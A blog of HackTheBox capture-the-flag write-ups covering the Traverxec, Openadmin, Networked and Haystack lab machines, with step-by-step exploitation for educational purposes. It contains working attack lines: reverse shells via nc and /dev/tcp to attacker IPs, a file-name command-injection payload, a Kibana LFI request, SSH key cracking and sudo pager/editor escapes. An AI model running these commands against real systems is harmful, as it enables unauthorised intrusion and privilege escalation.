All Posts:

2020
April: Traverxec
January: Openadmin

2019
November: Networked, SSH Tunnel, Netcat, Haystack

TRAVERXEC@HTB

Traverxec is an easy box from hackthebox. Ok, let's start.

Quick Hack:

User: Port Scan > 80/http > nostromo server > search for exploit > metasploit exploit > reverse shell > reading nostromo conf and manual > getting ssh creds in a directory > ssh as david > user.txt Root: david > reading server-stats.sh script > sudo without password for a particular command > abusing it with vim > root.txt

US3R

Run nmap to find open ports. We have two open ports: 22 is ssh and 80 is http. Open http in the browser. There is nothing interesting other than a name, David White, which may be a potential user name; just take a note. View source: nothing there. Nmap says it is running nostromo 1.9.6, and any 404 error page shows the same banner.

Ok, so let's learn about nostromo. After some reading I came to know that it is a web server. Ran searchsploit against it and got a Directory Traversal RCE, but that is for an older version. I googled for nostromo 1.9.6 vulnerabilities and got a metasploit exploit for RCE (the bug is CVE-2019-16278, a directory traversal in the request path that lets an unauthenticated POST execute /bin/sh). Recently there is a python exploit too, but I didn't use that; metasploit worked fine for me.

Ran the metasploit exploit and got a session as www-data, then transferred it to a netcat session and stabilised it. From this point you can run linenum or linpeas, but it doesn't help here. Looking at the /home directory, there is only one user, david, and we don't have read access to this directory. This is not normal; normally a home directory is at least readable. Let's go to the nostromo server directory to see if we can find anything interesting there:
cd /var/nostromo
Let's go to the conf folder. There is a file nhttpd.conf. To understand this file we have to read the documentation of the nostromo server (the nhttpd man page). Let's google it. I read it several times to understand how everything works. The homedirs part says it can serve users' home directories as docroot: a request to /~user/ is served from the user's directory under homedirs. That is interesting, as we don't have read access to the user's home directory. There is another option, homedirs_public, that restricts what is served out of a home directory to one named subdirectory. Let's look at nhttpd.conf again. It sets homedirs to /home and homedirs_public to public_www. So there must be a directory named public_www in the user's home directory:
cd /home/david/public_www
It works. Ahhhh, that's why there was no read access to /home/david: the directory has the execute (search) bit but not the read bit, so you cannot list it, but you can still enter a subdirectory whose name you already know, and that is exactly what nostromo needs to serve public_www. List the files; there is a directory named protected-file-area. Let's go there. There is a file named backup-ssh-identity-files.tgz. This is a gzipped tar archive, and the name suggests it holds ssh credentials. Ok, let's extract it to /tmp:
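The homedirs and homedirs_public rules above are easy to get wrong when reading a config, so here is an added example (written for this page, not code from the post or from nostromo) that models those two man-page rules on a constructed nhttpd.conf: a request for /~user/... is served from <homedirs>/user, and when homedirs_public is set only that subdirectory of the home is reachable. The config text, the user name david and the request paths are constructed for the demonstration.

```python
"""How nostromo's homedirs / homedirs_public settings pick the served path.

Added example, not code from the post or from nostromo: it re-implements the
two man-page rules (a request for /~user/... is served from <homedirs>/user,
and if homedirs_public is set only that subdirectory of the home is exposed)
on a constructed nhttpd.conf so the effect of the directive is visible.
"""
import posixpath

# Constructed config in the shape of Traverxec's nhttpd.conf; only the
# directives this example reads are kept.
SAMPLE_CONF = """\
# MAIN [MANDATORY]
serverroot      /var/nostromo
docroot         /var/nostromo/htdocs
docindex        index.html

# HOMEDIRS [OPTIONAL]
homedirs        /home
homedirs_public public_www
"""


def parse_nhttpd_conf(text):
    """Return {directive: value}; comments and blank lines are skipped."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf[parts[0]] = parts[1].strip() if len(parts) > 1 else ""
    return conf


def resolve(conf, request_path):
    """Filesystem path nhttpd would serve for request_path, or None if the
    request names ~user while homedirs is not configured."""
    # Normalise before joining: collapsing ../ at the URL level is what keeps
    # the result inside the document root (skipping it is a traversal bug).
    path = posixpath.normpath("/" + request_path.lstrip("/"))
    if path.startswith("/~"):
        homedirs = conf.get("homedirs")
        if not homedirs:
            return None
        user, _, rest = path[2:].partition("/")
        base = posixpath.join(homedirs, user)
        public = conf.get("homedirs_public")
        if public:
            # only <home>/<homedirs_public> is reachable over HTTP
            base = posixpath.join(base, public)
        return posixpath.normpath(posixpath.join(base, rest))
    return posixpath.normpath(posixpath.join(conf["docroot"], path.lstrip("/")))


if __name__ == "__main__":
    conf = parse_nhttpd_conf(SAMPLE_CONF)
    open_conf = {k: v for k, v in conf.items() if k != "homedirs_public"}
    requests = (
        "/~david/",
        "/~david/protected-file-area/backup-ssh-identity-files.tgz",
        "/~david/.ssh/id_rsa",
    )
    for label, c in (("with homedirs_public", conf), ("without it", open_conf)):
        print(label)
        for req in requests:
            print(f"  {req} -> {resolve(c, req)}")
```

Run it and compare the two blocks of output: with homedirs_public every /~david/ request lands under /home/david/public_www, while without it the same requests would walk the whole home directory, .ssh included.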
tar zxvf backup-ssh-identity-files.tgz -C /tmp
cd /tmp
ls -la
It creates a home/ folder; let's go there:
cd home
There is a folder david and within it a folder .ssh; let's go there. There are three files: id_rsa, id_rsa.pub and authorized_keys. Get these files and try to log in with the private key:
ssh -i id_rsa david@10.10.10.165
Oops! It asks for a passphrase. Ok, give this file to john to crack it:
python ssh2john.py id_rsa > id_rsa.john
john id_rsa.john --wordlist=/usr/share/wordlists/rockyou.txt
john cracks it very soon and the passphrase is "hunter". Ok, now log in with these credentials and get the user flag.

R00T

Getting root is easy. David's home directory has two files, server-stats.head and server-stats.sh. Run the shell script; it prints nostromo server information. Ok, let's check the script:
cat server-stats.sh
Everything is fine but the last line is interesting: it runs journalctl through sudo, without a password, and pipes the output to cat. Copy that last line and run it from the terminal; it works fine. But how to exploit that? Ok, let's remove the cat command from the end, and it still works. The difference is that journalctl now hands its output to a pager, and that pager is started by the root journalctl, so it runs as root. One caveat: systemd starts the pager with LESS=FRSXMK, and the F flag makes less quit immediately when the output fits on one screen, so shrink your terminal to fewer rows than the five lines of output before running the command. When it is showing the server details, press v. It opens the file in vim. Now type
:!/bin/sh
It opens a shell as root. How did I know to exploit it this way? This is similar to a hack from the bandit game of overthewire. You can play that awesome game here. When I remove the cat command, journalctl opens its output in a pager, less, and it is a feature of that tool that typing v opens the file you are viewing in an editor ($VISUAL or $EDITOR, vi by default). Vim is a powerful text editor on linux, but most importantly you can run commands from vim. And that's what I did: as vim was opened as root I just opened a shell from there and became root. You can learn what else you can do with vim from gtfobins. How do I know it opened in less? Just by looking at the prompt in the bottom-left corner of the terminal. Hope you enjoyed; Happy Hacking.

Openadmin

OPENADMIN@HTB

Openadmin is an easy box from hackthebox. Ok, let's start.

Quick Hack:

Initial foothold: Port Scan > 80/http > /music site > login link > OpenNetAdmin panel > exploit for that version > modify and run it > get login details for jimmy. User1: ssh as jimmy > run id > find files for group internal > internal service running on localhost > ssh port forwarding > modify one script > open the service > get ssh key for joanna. User2: Crack the ssh key > ssh as joanna > user.txt Root: run sudo -l > one sudo command without password > GTFO bins > abusing the nano editor > root.txt

INITIAL FOOTHOLD

Run nmap to find open ports. We have two open ports: 22 is ssh and 80 is http. Open http in the browser. Default apache config page, nothing interesting there. So let's run gobuster:
gobuster dir -u http://10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
After running, it will start to find other directories. Let's go to the /music folder. It is a site itself. Look at the links on the site: login and create an account could be potential entry points to something interesting. The login link points somewhere else, "/ona". Open it, and it opens a new service, OpenNetAdmin, which also reveals its version: 18.1.1. Search for an exploit for this version of OpenNetAdmin:
searchsploit opennetadmin
And it gives a result: an RCE is present in that version, with one shell script and a metasploit module for the exploit. I took the shell script. But the shell script does not work as it is; you have to make some modifications to run it. So I made the modifications and put it on github; get it from here. Run it:
./script.sh http://10.10.10.171/ona 10.10.xx.xx
You will get a shell, but it is not a fully functional reverse shell: the script sends each command to the server as a separate HTTP request, so nothing like cd or an interactive program carries over between commands. From here you can upload a php reverse shell script and get a proper reverse shell to work with, or you can just get the information you need for the next step and close it. How to use a php reverse shell I have explained in the Networked writeup. Ok, now you have a shell as www-data; let's go for a user.

US3R 1 - JIMMY

As www-data you land in /opt/ona/www, and cd does not stick here because every command runs in a fresh shell, so use paths relative to that directory instead. Run cat on /etc/passwd and you will get two users there, jimmy and joanna:
cat /etc/passwd
Run ls and you will see a bunch of files and directories; start enumerating them. I am only showing the path where you will get something interesting:
ls local/
ls local/config/
cat local/config/database_settings.inc.php
Here in this file you get a password for the mysql database. Grab that password and try to log in over ssh with it as joanna and as jimmy (password reuse). You will be able to log in as jimmy with that password. But there is no user flag here, so you have to become joanna to get the user flag. As www-data you can also run local privesc scripts like linenum or linpeas, but that didn't help me, so I am omitting that part.

US3R 2 - JOANNA

Ok, as always I try ps aux, sudo -l, id, crontab -l etc. to get a basic idea about the user, its groups, what the user can do and whether any cron is running. id says jimmy is a member of a special group named internal. That's interesting; let's see who the members of that group are:
cat /etc/group
We can see that joanna is also a member of that group. Ok, let's check which files and folders belong to that group:
find / -group 1002 2>/dev/null   # 1002 is the gid of the internal group; find / -group internal works too
We get /var/www/internal. Ok, let's go there and see the files:
cd /var/www/internal
ls -la
There are three files, but the interesting one is main.php. Cat all the files and see what is there. main.php checks whether the user is authenticated as jimmy (a PHP session set by the login page); if yes it runs a command to cat joanna's private ssh key and prints it, and if not it redirects to the authentication page. But how to reach the internal directory from the browser? We didn't get any directory for it in gobuster. Then what to do? You can run:
ss -lt
It lists all listening tcp ports, and among others there is port 52846, which is unknown and listening only on localhost. Or you can go to the apache config directory and see what is going on there:
cat /etc/apache2/apache2.conf
At the bottom it says to look in the sites-enabled/ directory for virtual hosts. Going there we find the internal.conf file:
cd sites-enabled/
cat internal.conf
It says the vhost listens on 127.0.0.1:52846, which matches our previous finding from ss -lt. Ok, to reach a service listening on localhost we have to do ssh port forwarding; I have discussed it in detail here:
ssh -L 8000:localhost:52846 jimmy@10.10.10.171
Now open localhost:8000/main.php in the browser. Damn! It redirects to the index page for authentication. Ok, get back to the box, go to the internal folder, copy main.php into another file and open it in vim to edit it:
cp main.php main2.php
vim main2.php
Then remove everything that redirects to the index page for authentication, mainly everything in the first line after the <?php tag. Then open main2 in the browser: localhost:8000/main2.php. Gotcha! It prints joanna's ssh private key. (A shortcut: main.php sends the redirect with header("Location: ...") but never calls exit afterwards, so PHP keeps executing and the key is already in the body of the 302 response; curl http://localhost:8000/main.php, which does not follow redirects unless you pass -L, prints it without editing anything.) Copy the key, put it into a file and change its permissions:
nano id_rsa #paste it here and save the file
chmod 600 id_rsa
Try to log in with it, and you can't: it asks for a passphrase. Give the file to john to crack it:
./ssh2john id_rsa > id_rsa.john #converting it to a format that john can understand

john id_rsa.john --wordlist=/usr/share/wordlists/rockyou.txt
john cracks it very fast and gives the passphrase. Log in with it as joanna and grab the flag:
ssh -i id_rsa joanna@10.10.10.171

R00T

As joanna try:
sudo -l
And joanna can run /bin/nano /opt/priv with sudo without a password. Wow, that's cool. How to exploit it? Go to gtfobins and type nano; at the end you find how to get a shell when it is running with sudo privilege. Run sudo /bin/nano /opt/priv and then press
Ctrl+r Ctrl+x
reset; sh 1>&0 2>&0
Press enter and that's it, you get a shell as root. Go grab the flag and submit it. That's all. Hope you enjoyed; Happy Hacking.

Networked

NETWORKED@HTB

Networked is an easy box from hackthebox. Ok, let's start.

Quick Hack:

User: Port Scan > 80/http > view-source or dirbuster > uploads.php & photos.php > php file upload > reverse shell > user home directory > crontab.guly, check_attack.php > create file in /uploads dir > rev shell as user guly > user.txt Root: guly > sudo -l > sudo permission for execution of changename.sh without password > run it accordingly > root.txt

US3R

Run nmap to find open ports. We have two open ports: 22 is ssh and 80 is http. Open it in the browser; there is nothing interesting, so let's view source. There is a comment about upload and gallery. So put uploads.php in the url and you find an upload page, but it says the file should be an image. You can also find photos.php, where you can see the uploaded files. [You may not be able to guess uploads.php and photos.php manually, so run dirbuster or gobuster to brute force directories:
gobuster dir -u http://10.10.10.146/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
It will give what you need.] Now you have to find a way to upload a reverse shell. As it is running php, download a php reverse shell script from google and edit the IP and port. As it says the file should be an image, there is some filtering which you have to bypass. First change the name of your shell script:
mv php-reverse-shell.php php-reverse-shell.php.gif 
This isn't enough; you also have to add the magic bytes of a GIF file at the beginning of the shell, which for GIF is GIF89a, because the upload check looks at the file's content, not only at its extension. Ok, now set up a netcat listener on the port you set in the script, upload the file and open photos.php; you will get a reverse shell as apache. Go to the user's home directory; you will find the user flag, but you can't read it as apache. You have to be guly to get it. Read crontab.guly and check_attack.php. The crontab says there is a cron running the script check_attack.php as guly every few minutes. Read it carefully. It lists the files in /var/www/html/uploads, puts each name into $value and passes it unquoted into an exec() call that removes the file through the shell. So if the name of the file contains a command, the shell runs it, as guly. This box has netcat installed, so let's try to get a netcat reverse shell. Go to the /uploads directory and create a file:
touch ";nc -c bash <your ip> 443;#"
Set an nc listener on port 443 and within a few minutes you will get a reverse shell as guly.
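To make the check_attack.php step concrete, here is an added example (written for this page, not the box's own script) that rebuilds in Python the one exec() line that matters, splits the result the way /bin/sh would, and puts the quoted version beside it (PHP's escapeshellarg, here shlex.quote). The directory listing, the file names and the attacker address 10.10.14.2 are constructed; the vulnerable string is built the same way the page describes, with $value interpolated unquoted.

```python
"""Why a file name in /var/www/html/uploads became a command on Networked.

Added example, not the box's own check_attack.php: it rebuilds in Python the
single exec() line that matters (the file name is interpolated into a shell
command unquoted), shows how /bin/sh would split the result, and puts the
quoted version (PHP's escapeshellarg, here shlex.quote) beside it. The
listing and the attacker IP 10.10.14.2 are constructed.
"""
import re
import shlex

UPLOADS = "/var/www/html/uploads/"

# constructed listing of the uploads directory: one ordinary upload and one
# file created with   touch ";nc -c bash 10.10.14.2 443;#"
SAMPLE_LISTING = [
    "10_10_14_2.php.gif",
    ";nc -c bash 10.10.14.2 443;#",
]

# characters that let a file name break out of an unquoted shell command
SHELL_META = re.compile(r"[;&|`$<>()\\\n]")


def vulnerable_rm(path, value):
    """The command the script builds: $value goes in unquoted."""
    return f"nohup /bin/rm -f {path}{value} > /dev/null 2>&1 &"


def safe_rm(path, value):
    """Same command with the file name passed as one quoted argument."""
    return f"nohup /bin/rm -f {shlex.quote(path + value)} > /dev/null 2>&1 &"


def shell_commands(cmdline):
    """Split a command line into the separate commands a POSIX shell would
    run, honouring quotes, ';' separators and '#' comments. Redirections
    stay inside the command they belong to. Returns a list of argv lists."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def suspicious_uploads(listing):
    """Names that would inject into the unquoted command: a cheap check to
    run over the uploads directory or inside the upload handler itself."""
    return [name for name in listing if SHELL_META.search(name)]


if __name__ == "__main__":
    for name in SAMPLE_LISTING:
        print("file:", repr(name))
        print("  unquoted ->", shell_commands(vulnerable_rm(UPLOADS, name)))
        print("  quoted   ->", shell_commands(safe_rm(UPLOADS, name)))
    print("flagged:", suspicious_uploads(SAMPLE_LISTING))
```

For the crafted name the unquoted line splits into two commands: the rm with an empty target, then nc -c bash 10.10.14.2 443, with the trailing # swallowing the redirections the script appended. The quoted line stays one command whose fourth argument is the whole file name, so rm just fails to find it.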

R00T

Getting root is easy. Type
sudo -l
as guly to see what permissions this user has. guly can run a script as sudo without a password. Go to that directory and try to run it as sudo. It asks for some arguments. Look at the error message: base64 --decode was given as input and it treated --decode as a command, so whatever you put after a space is treated as a command. The reason is that the script writes your input into a network interface config file and then brings the interface up, and the network scripts source that file as shell, so a value containing a space runs the word after the space as a command. Read more about this vulnerability. Now try this: put
/bin/bash
after a space and you get a shell as root. Yup, that's it. Hope you enjoyed; Happy Hacking.

Haystack

HAYSTACK@HTB

Haystack is an easy box from hackthebox. Ok, let's start.

Quick Hack:

User: Port Scan > 80/http > download image > run strings > base64 --decode. 9200/http > search in quote db > base64 --decode > user & password > ssh as security > user.txt Root: security > kibana lfi > rev shell as kibana > /etc/logstash/conf.d > grok filter > put file in /opt/kibana/logstash_* > rev shell as root > root.txt

US3R

Run nmap to find open ports. We have open ports: 22 is ssh, 80 is http and 9200 is also http. Open 80 in the browser and there is a picture of a needle in a haystack. Download it and run strings against it. There is a base64 encoded string on the last line; save it in a file and decode it:
base64 --decode file.b64
It is a line in Spanish; use google translate if you don't know Spanish (the whole box is in Spanish, so learning some Spanish is an extra gain). The line says the needle in the haystack is the "key" (clave). Keep it; it will help later.
Let's look at port 9200. It says it is elasticsearch. Run gobuster in the background on port 9200:
gobuster dir -u http://10.10.10.115:9200/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Let's look at those urls. They dump some data in Spanish, not very useful. Go to the elasticsearch and ELK stack documentation and figure out how to query the database. After some study I found that the _search endpoint accepts a query string:
http://10.10.10.115:9200/_search?q=
We found “clave” (key in spanish) in the needle image, so let’s do this:
http://10.10.10.115:9200/_search?q=quote:clave
There are two base64 encoded strings; decode them. They are
user:security
pass:spanish.is.key
Log in over ssh with those credentials and get the user flag.

R00T

Now run linenum to enumerate the box. Look closely: logstash is running as root, which is not normal; it should run as the logstash user. The user security can't read or write the logstash config files, but kibana can. So now let's try to become kibana. Search on google for kibana vulnerabilities and you will find an LFI (local file inclusion) vulnerability in the console API (CVE-2018-17246), which loads an arbitrary local file as a node module. Read more. The system is running node.js, so download a js reverse shell payload and put it in /tmp. Kibana listens only on localhost, so run this from your ssh session on the box:
curl "http://127.0.0.1:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/rev.js"
Set a netcat listener on 9001, as per the script, and you will get a reverse shell as kibana. (You may not get a shell sometimes, which is frustrating: check the url, or change the name of the .js file and try again. Node caches a module once it has been required, so a file that was already loaded under a path is not executed a second time; a new file name is a fresh module.) Now go to the
/etc/logstash/conf.d
folder; there are three files, input.conf, filter.conf and output.conf. Together they say that any file in /opt/kibana named logstash_* is read by the file input with type execute, the filter extracts a command from lines of the form "Ejecutar comando : <command>", and the output runs that command through exec. Since logstash runs as root, the command runs as root. Create a file in /opt/kibana named logstash_hello:
echo 'Ejecutar comando : bash -i >& /dev/tcp/10.10.15.44/9005 0>&1' > /opt/kibana/logstash_hello
Set a netcat listener and wait a while; the file input scans /opt/kibana periodically, and you get the reverse shell as root. That's it. (Ooh, I lost that screenshot, and I don't want to do this annoying box again!) Hope you enjoyed; Happy Hacking.